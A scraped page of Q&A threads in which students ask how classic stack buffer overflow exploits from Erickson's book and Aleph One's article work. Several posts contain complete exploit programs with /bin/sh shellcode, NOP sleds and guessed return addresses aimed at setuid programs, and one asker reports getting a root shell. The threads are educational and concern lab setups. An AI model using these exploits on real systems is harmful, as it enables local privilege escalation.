Buffer Overflow esp offset

Buffer Overflow esp offset - c

I'm a computer engineering student who is studying how stack buffer overflows work. The book I'm reading is The Art of Exploitation (1st edition) by Jon Erickson.
In order to practice what I'm studying I've installed Damn Vulnerable Linux distribution in a virtual machine. I've disabled ASRL (kernel.randomize_va_space = 0), I've compiled the following codes with GCC 3.4.6, I'm using GDB 6.6 and the kernel of the distribution is 2.6.20. My computer has an Intel processor.
The vulnerable program (test2) is created by root and is set as setuid.
The vulnerable code is the following:
//test2.c
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
While the exploit code, created by normal (non root) user, is the following:
//main.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer2, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
buffer2 = malloc(600);
ptr = buffer2;
addr_ptr = (long *)ptr;
for (i = 0; i < 600; i += 4)
{
*(addr_ptr++) = ret;
}
for (i = 0; i < 200; i++)
{
buffer2[i] = '\x90';
}
ptr = buffer2 + 200;
for (i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
buffer2[600 - 1] = 0;
execl("/root/workspace/test2/Release/test2", "test2", buffer2, 0);
free(buffer2);
return 0;
}
The program works, it exploits the buffer overflow vulnerability in test2 and gives me a root shell.
What I don't understand, even after reading the book several times and trying to find answers on the internet, is why the value of the stack pointer that we store in the variable esp is the return address of our shellcode. I've disassembled the program with GDB and everything works as the author says but I don't understand why this happens.
I would have liked to show you how the disassembled program looked like and how the memory looked like during execution, but I cannot copy/paste from the guest machine on the virtual machine and I'm not allowed to insert images in my question. So I can only try to describe what happens during execution of the program main (the one that exploits the BOF in test2):
disassembling main, I see that 28 bytes are allocated on the stack (7 variables * 4 bytes). Then the function sp() is called and the value of the stack pointer is stored in esp. The value stored in the variable esp is 0xbffff344. Then, as you can see, we have some printf, we store the payload in buffer2 and then we call the execl function passing buffer2 as an argument.
now the root shell shows up and then the program exits. Disassembling the program after setting a different offset, I can clearly see that 0xbffff344 is precisely the address where the payload is stored when test2 is executed. Could you explain me how does this happen? Does execl sets a new stack frame for the test2 program? In main.c only 28 bytes are allocated on the stack, while in test2 500 bytes are allocated on the stack (for buffer2). So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?
I thank you and apologize if I wrote some stupid things.

Could you explain me how does this happen?
When ASLR is disabled every executable starts at the same address, so given the stack pointer you are able to guess the required offset to find your buffer location in test2. This is also where the NOP sled becomes useful, since it give you multiple possible hit if the offset is not the exact displacement to the shellcode.
That being said the fact the the value of ESP in the main function of your exploit program IS the location of the executed buffer in test2 seems incorrect. Are you sure you just don't misinterpreted gdb results?
You should be able to compute the offset of the buffer using the following : esp - 500 + 28.
Note that you should always wear gloves when using such formula : how the compiler handles locals, (size, order, etc) can vary.
So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?
Well You don't. It depends of the machine, how the program was compiled etc.
Does execl sets a new stack frame for the test2 program?
From the execve man pages :
The exec family of functions shall replace the current process image
with a new process image. The new image shall be constructed from a
regular, executable file called the new process image file. There
shall be no return from a successful exec, because the calling process
image is overlaid by the new process image.
The stack is overridden by a new one for test2.
Hope it helps :)

Related

Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential

I'm looking at aleph's article on phrack magazine. The code below can also be found there.
We have a vulnerable executable which it's code is:
vulnerable.c
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
Now, since we don't really know, when trying to attack that executable (by overflowing buffer), what is the address of buffer. We need to know it's address because we want to override the ret to point to the beginning of buffer (in which we put our shellcode).
The guessing procedure that is described in the article is as follows:
We can create a program that takes as a parameter a buffer size, and
an offset from its own stack pointer (where we believe the buffer we
want to overflow may live). We'll put the overflow string in an
environment variable so it is easy to manipulate:
exploit2.c
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
char shellcode[] = //this shellcode merely opens a shell
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
Now we can try to guess what the buffer and offset should be:
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
I don't understand what does the writer meant to present, in explot2.c we guess the size of the buffer in vulnerable.c and it's offset from the stack pointer.
Why do we apply this offset on the stack pointer of exploit2?
How does this effect vulnerable?
What's the purpose of exploit2.c except from building the EGG environment variable?
Why do we call system("/bin/bash"); at the end?
What's going on between vulnerable and exploit2 in general?

The only purpose of exploit2 is building the egg variable, which needs to be passed as a parameter to vulnerable. It could be modified so to call vulnerable on its own.
The shellcode variable contains machine code for a function that invokes a shell. The goal is to copy this code into the buffer variable of vulnerable, and then overwrite the return address of the main function of vulnerable to point to the entry point of the shell code, that is, the address of the variable buffer. The stack grows downward: the stack pointer register (esp in 32-bit x86 architecture) contains the smallest address used by local variables of the current function, at higher addresses we find other local variables, then the return address of the currently executing function, then the variables of the callee and so on. An overflow write on a variable, such as buffer in vulnerable, would overwrite whatever follows buffer in memory, in this case the return address of main since buffer is a local variable of the main function.
Now that we know what to do, we need some information:
the address of the buffer variable, let's call it bp
the address of the return address of the main function, let's call it ra
If we had this information we could forge an exploit string EGG such that:
its length is ra - bp + sizeof(void*) in order to overflow the string buffer enough to overwrite the return address (sizeof (void* is the size of the return address)
it contains the exploit code to be executed at the beginning, and the address bp at the end
Note that we only need a rough guess for the length of the string because we can just make the string longer and keep repeating the address bp all over it, but we need to compute the exact bp address if we want the shellcode to be executed properly.
We start by guessing the string length needed to overwrite the return value: 600 is enough, because it triggers an Illegal instruction error. Once we find it, we can look for the bp address.
We know that bp is around the bottom of the stack, because that's where the local variables are stored. We assume that the address for the stack are the same in vulnerable and exploit2, we measure the stack address in exploit2 and start poking around changing offset. Once we get the right offset (the one which result in addr being equal to the target bp) the shell code will be executed when the control flow return from the main function of vulnerable.
If you want to test this code, remember that this does not work in modern machines because of the execution prevention technology which is used by operating system to marks pages containing data as not executable.

C - Buffer Overflow Details

This particular problem has been addressed a few times here on stackoverflow, but I cannot find any previous post that addresses some questions that I have. I would like to note that I have read Aleph One's "Smashing the Stack for Fun and Profit", but there are still gaps in my understanding.
My question is: This works (spawns a root shell) for various buffer sizes of stack.c in bof() from buffer[12] to buffer[24]. Why does it not work (seg fault) for buffer[48] (which results in a seg fault), for example (or, how would the program need to be modified to make it work for such buffers)?
Please note that the following commands are used when compiling stack.c
# gcc -o stack -z execstack -fno-stack-protector stack.c
# chmod 4755 stack
And ASLR is OFF.
First, let's look at the vulnerable program:
stack.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
And the program to exploit this: test.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// code to spawn a shell
char shellcode[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
FILE *badfile;
char *ptr;
long *a_ptr;
long *ret;
int offset = 450;
int bsize = 517;
char buffer[bsize];
// a_ptr will store the return address
ptr = buffer;
a_ptr = (long *) ptr;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, bsize);
/* Fill buffer with appropriate contents */
printf("Stack Pointer (ESP): 0x%x\n", get_sp());
ret = get_sp() + offset;
printf("Address: 0x%x\n", ret);
int i;
for (i = 0; i < 350; i += 4)
*(a_ptr++) = ret;
for (i = 450; i < sizeof(shellcode) + 450; i++)
buffer[i] = shellcode[i-450];
buffer[bsize - 1] = '\0';
/*Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
Below I will try to explain what I think is going on, and jot down notes as to where I believe the gaps in my knowledge are. If anyone has time to go over this as well as answer the question as stated earlier, then thank you.
Clearly, the buffer[12] in stack.c is going to be overflowed when strcpy() is called, because a string of size 517 is being copied into a buffer of size 12.
In test.c, I understand that we are creating the malicious buffer which is to be read by stack.c. This buffer is initialized with a bunch of NO-OP's (0x90). Beyond that, I am a bit confused.
1) What is the point of the offset being added to ret in ret = get_sp() + offset;? Also, why is offset = 450? I have tried other values for the offset and this program has still run (such as 460). 450 seems like a guess that happens to work.
2) At for (i = 0; i < 350; i += 4), why is 350 used? I don't understand the point of this value. I believe that this loop is filling the first 350 bytes of the buffer with the return address ret, but I do not understand why it is 350 bytes. I believe that we are increasing i by 4 each time because (long *) is 4 bytes. If this is true, shouldn't this 350 also be a multiple of 4?
3) Again, at for (i = 450; i < sizeof(shellcode) + 450; i++) (sizeof(shellcode) is 25), why do we start at 450 in the buffer? This is saying we are filling buffer[450] to buffer[475] with the shell code. Currently, everything after that should be initialized to a NO-OP. So what? Why 450 - 475?

Keep in mind that, in a 32-bit x86 program such as this, the bytes on top of the stack hold, from lowest address on up: local variables, the return address of the function, its parameters, any registers saved by the caller, the caller’s local variables, etc.
The loop is actually writing 348 bytes worth of four-byte return addresses to the top of the stack. (It predated C99 and x86_64 and therefore assumed that long is exactly 32 bits.) The purpose of this is just to ensure that, for any plausible amount of storage for local variables, the return address will get overwritten. It also tries to handle the case where the function with the vulnerability gets called from several levels deep and the top of the stack is no longer the same. Then there’s some padding with nop instructions, because if the function return lands anywhere in there, the CPU will just skip them. Finally, there’s the shell code, in machine language. The whole point is to get the return address to point anywhere in this part of the buffer. Note that this will only work if the exploit code can be sure that the address of the stack pointer in the caller’s address space is similar. Address-space randomization is a technique to defeat this.
In other words, the code repeats itself a few hundred times because stuff might not be at exactly the same place in a new process, and this way, it still works if the stack pointer is anywhere close to where it expects. The values are ballpark figures, but Aleph One talks about how to find them.

Understanding Aleph one's overflow using environment variable

I'm reading "Smashing The Stack For Fun And Profit", and reached the first example of overflow using an environment variable:
exploit2.c
------------------------------------------------------------------------------
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
Now we can try to guess what the buffer and offset should be...
Now, I understand the overall theory of setting an environment variable of the form "NAME=VALUE",
and as we can see in the code above it is EGG=OUR_SHELL_CODE.
But I'm not sure of where/when does the overflowing occurs... does main's return address is being overwritten? wish addr? what's with the offset? What address are we trying to reach?
Why are we looking for the address of the stack pointer? I mean using malloc() will allocate memory on the heap, so why do we need the address of the end of the stack (using get_sp())?
In addition, overflowing a buffer in the heap won't overwrite the return address..
Why are we writing "system("/bin/bash");"? (we already have bin/sh in the shellcode)
Is it the way to somehow load/execute the environment variable?
Please fill in all the gaps for me (as thorough as possible) on the steps of this exploit.
Thank you very much! :-)

This is a helper program that will create the exploit. This isn't the vulnerable program, that one is aptly named vulnerable.
This program builds an EGG environment variable using heap memory which contains an exploit created based on the arguments specified. It assumes that the stack pointer of the vulnerable program will be somewhat similar to the current program's. The offset is used to cancel any differences. The exploit will have size bsize and it will contain the shell code itself, followed by copies of the guessed address for the start of the shellcode. This trailing portion will hopefully overwrite the return address in the vulnerable program and thus transfer control to the payload.
After the EGG has been created, the program spawns a shell for you so that you can start the vulnerable program. You can see in the original article that the vulnerable program is launched by ./vulnerable $EGG.
This exploit generator isn't terribly good code, but that's a different matter.

Disabling ASLR causes fread() to fail in c program

I am working on a homework assignment concerning a bufferOverflow.
The test program uses fread() to read 4096 bytes from a file.
When I set kernel.randomize_va_space to 0, and run the program in gdb, I can see that the fread() command returns nothing.
If I set kernel.randomize_va_space to either 1 or 2, and rerun the program using gdb, I can see the expected data in the buffer where fread stores the file.
Why would ASLR cause fread to stop working properly?
FYI: this is ubuntu 12.0.4 64-bit, and the program was compiled with the -c99 and -m32 flags to gcc.
The test program I was given for this assignment is as follows:
#include <stdio.h>
#define READSIZE 0x1000
void countLines(FILE* f){
char buf[0x400];//should be big enough for anybody
int lines=0;
fread(buf,READSIZE,1,f);
for(int i=0;i<0x400;i++)
if(buf[i] == '\n')
lines++;
printf("The number of lines in the file is %d\n",lines);
return;
}
int main(int argc,char** argv){
if(argc<2){
printf("Proper usage is %s <filename>\n",argv[0]);
exit(0);
}
FILE* myfile=fopen(argv[1],"r");
countLines(myfile);
return 0;
}
When I run it in gdb, I place my breakpoint on the line:
for(int i=0;i<0x400;i++)
In gdb, I then do the following:
(gdb) x $esp
0xbffff280 0xbffff298
If I do:
(gdb) x /12wx $esp
I can see that the first 4 bytes are the address of buf, the next 4 bytes are the 0x1000 passed to fread and the next 4 bytes are 0x01 which was also passed to fread.
This looks to me like the stack frame for the fread function not the stack frame for countLines().
Why wouldn't $esp be pointing to the current stack frame not hte one that was just exited?
Update
I modified the code as follows:
#include <stdio.h>
#define READSIZE 0x1000
void countLines(FILE* f){
char buf[0x400];//should be big enough for anybody
int lines=0;
int ferr=0;
fread(buf,READSIZE,1,f);
ferr=ferror(f);
if (ferr)
printf("I/O error when reading (%d)\n",ferr);
else if (feof(f))
printf("End of file reached successfully\n");
for(int i=0;i<0x400;i++)
if(buf[i] == '\n')
lines++;
printf("The number of lines in the file is %d\n",lines);
return;
}
int main(int argc,char** argv){
if(argc<2){
printf("Proper usage is %s <filename>\n",argv[0]);
exit(0);
}
FILE* myfile=fopen(argv[1],"r");
countLines(myfile);
return 0;
}
When I run it with ASLR diabled, I get:
I/O errorwhen readin (1)
If I run it with ASLR enabled (value=1),
get
EOF reached.

fread() reads up to nitems elements of size size into an array pointed to by ptr. It is the programmer's responsability to ensure the array is big enough.
That last part is important. fread() has no way of knowing the actual size of the array. It will happily read stuff and store it past the end of the array. Accessing past the end of the array results in Undefined Behavior: there is no guarantee as to what will happen, notably, in this case, it can result in arbitrary code execution.
As to why sometimes it bombs and sometimes not:
With no ASLR you had this:
(gdb) x $esp
0xbffff280 0xbffff298
with the buffer at address 0xbffff298. The top of the stack is at 0xbfffffff, which leaves 3432 bytes between the start of the buffer and the end of the stack. When trying to read into the buffer, the process has nothing mapped at 0xc0000000 in userspace (which you can check with cat /proc/<pid>/maps, to see the process' userspace mappings) , so the underlying read() system call fails with EFAULT - Bad address.
With ASLR, there is some randomization for stack placement. The stack base has ~11 bits 1 of randomness on x86 (arch/x86/include/asm/elf.h):
/* 1GB for 64bit, 8MB for 32bit */
#define STACK_RND_MASK (test_thread_flag(TIF_IA32) ? 0x7ff : 0x3fffff)
and the stack top has 9 additional bits of randomness (arch/x86/kernel/process.c:arch_align_stack(), called from fs/binfmt_elf.c:create_elf_tables()):
if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
sp -= get_random_int() % 8192;
return sp & ~0xf;
So, arch_align_stack() offsets the stack top [0,8176] bytes, in 16 byte increments, i.e, the initial stack pointer may be moved 0, 16, 32, ..., 8176 bytes from its original position.
So, with your 3432 bytes (the buffer, plus space for argc, argv, envp, auxp, assorted pointers to them, and padding), plus the variable ASLR offset, you have only ~8% chance of having less than 4096 bytes on your stack, which would allow you to see the SEGV with ASLR on. Just try a lot of times, and you should see it about once every 12 tries.
1 The stack base can also be moved an additional page, see fs/exec.c:setup_arg_pages():
stack_top = arch_align_stack(stack_top);
stack_top = PAGE_ALIGN(stack_top);

As for the fread() arguments on stack, that's correct - these are stored before the caller's BP value is pushed on the stack by the callee, so they are part of the caller's stack frame - check x86 stack frame description. On x86-64 you won't see them since they are passed to the callee in registers.
As for the ASLR error, get the error description with perror(). Or better install debuginfo packages for glibc, so that you can trace the code into fread() itself.

I never figured out why the fread() function ws failing so I replaced it with an fgets() function and finished the assignment.
Thank you everyone for all the help.
This forum is great!

Stack-based overflow code from Hacking: The Art of Exploitation

This might be related to this, but i'm not sure if it's in the same boat.
So i've been re-reading Hacking: The Art of Exploitation and I have a question about some of the C code in the book, which doesn't quite make sense to me:
Let's just assume we're back in ~2000 and we don't really have stack cookies and ASLR (maybe we do, but it hasn't been implemented or isn't widespread), or any other type of protection we have now-a-days.
He shows us this piece of code to exploit a simple stack-based overflow:
#include <stdlib.h>
char shellcode[] = "..." // omitted
unsigned long sp(void)
{ __asm__("movl %esp, %eax); }
int main(int argc, char *argv[]) {
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
// bunch of printfs here...
buffer = malloc(600);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i = 0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
for(i = 0; i < 200; i++)
{ buffer[i] = '\x90'; }
ptr = buffer + 200;
for(i = 0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
buffer[600-1] = 0;
execl("./vuln", "vuln", buffer, 0);
free(buffer);
return 0;
}
So what he wants to do is take the address of the ESP and overwrite the saved EIP with that address, so that the processor will jump to his NOP sled in memory and execute the shellcode in the stack.
What I do not understand, is how he can use that particular ESP value that he gets from sp() at the current time he calls it.
From what I understand, the stack looks "something" like this:
...
saved ebp <-- execl
saved eip
"./vuln"
"vuln"
buffer
0
*ptr <-- sp() returns this address?
*buffer
*addr_ptr
ret
esp
offset
i
saved ebp <-- main
saved eip
argc
argv
...
Since he calls (I know it's a function pointer, so I guess not entirely accurate wording?) sp() so early in the exploit, shouldn't it give him a bad ESP address? Even for that matter, I don't see how he can even use that technique here, because he will never get the ESP that points to the top of the buffer inside his vuln program.
Thanks.

I don't see how he can even use that technique here, because he will never get the ESP that points to the top of the buffer inside his vuln program.
I haven't read much of the book, but I think I've figured this out. Here's what *buffer looks like:
NOP sled | shellcode | Address of buffer in the exploit's stack frame
When vuln does strcpy() on buffer into its own stack, it fails to check the bounds and overwrites its own EIP with the address of the start of the buffer in the exploit's stack frame, or at least something close to it (hence the NOP sled). The NOP sled and shellcode copied to vuln's stack frame are incidental; that's not where they run from. It's critical that the sled and shellcode be smaller than how big vuln expects buffer to be, otherwise the saved EIP will be overwritten by shellcode rather than the address of buffer.
Then, when whatever portion of vuln that uses strcpy() on buffer returns, it goes to the NOP sled and executes the shellcode.
The important point is that buffer is read twice, in two different places.
Edit: Disregard that, I confused myself (though thanks for the accept!). Hopefully I will not confuse you too, which is why I'm writing this edit. The vulnerable program is in a completely different virtual memory space since it is run by the operating system in a separate process (or the same process with a new image? Whatever). So there'd be no way for vuln to access the exploit's stack or heap.
The ESP trickery must be some way to guess where the NOP sled in the copied buffer ends up in vuln's stack. I personally would expect a much larger offset than 0 since the exploit's stack is quite small compared to vuln's.
That said, I'm pretty sure there are still two copies of the shellcode in vuln (otherwise, what could it strcpy() from?). With an offset of 0, perhaps he is running the shellcode stored in argv[]...?!? In that case, you'd still have a situation where the address in one buffer points to the NOP sled in another buffer, as in my original answer. I've been wrong before though, so let me know if that makes no sense.

A lot will depend on what specific OS the code was intended to exploit. Without knowing this, any discussion has to be somewhat generic [and a guess on my part].
One possibility is that there was something significant in the "bunch of printfs" you've left out...
If there's really nothing clever happening there, I would guess that the vulnerability it's trying to exploit is within the execl(..) call and/or the OS when effectively passed a long (600 byte) command-line parameter. Somewhere in there [I'm guessing] a subroutine will be setting up the environment for the new process, and along the way will be copying the 600-byte string passed in as a parameter (buffer) into what may well be a small(ish) fixed size buffer on the stack of the new process, and [presumably] overwrites the return address of this "setup" function with many copies of the stack pointer from the original call. When the "command-line copying function" returns, it will thus return to the carefully-prepared buffer from the original copy and execute the shellcode.
(If the omitted shellcode contained a zero byte ...\x00... then this cannot be what's happening, as it would mark the end of the string being copied in setting up the command-line buffer).

:) I had been at this for days trying to find out what was actually going on. In the process i also discovered this post. Now that i have a glimpse of what is going on i thought i should share what i understood so that others like 'me' would also find this useful.
unsigned long getesp()
{
__asm__("movl %esp, %eax");
}
This function is actually used to guess the return address. It returns the ESP value of our shellcode injection program NOT the ESP value of the vulnerable program. But since the stack starts at almost the same address ( for systems without ASLR enabled) and as aleph one mentions in his article "Most programs do not push more than a few hundred
or a few thousand bytes into the stack at any one time. Therefore by knowing
where the stack starts we can try to guess where the buffer we are trying to
overflow will be ", we can get an idea of where our shellcode should be. Let me explain.
Suppose that for our test program, the stack starts at 1000. This address is actually returned by the above code when we execute it. Now consider our vulnerable program and suppose that the buffer we are trying to inject to is at address 970, and the return address is stored at 1040.
[BUFFER 970][RETURN_ADDRESS 1070]
Ok? Now the buffer is filed with NOPS till the first half,then with the shellcode and then with the return address right..
[NOP SLED][SHELL_CODE][RETURN_ADDRESS]
lets fill it like this
NOPS [970-1010] SHELLCODE[ 1010-1050 ] RETURN_ADDRESS[1050-1070]
The value returned by the getesp() gives an idea of where the stack will be. so if we rewrite the return address with 1000 which was returned by getesp(), we can see that the exploit would still work because the address at 1000 is filed with nops. the exection will slide down to the shellcode !

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight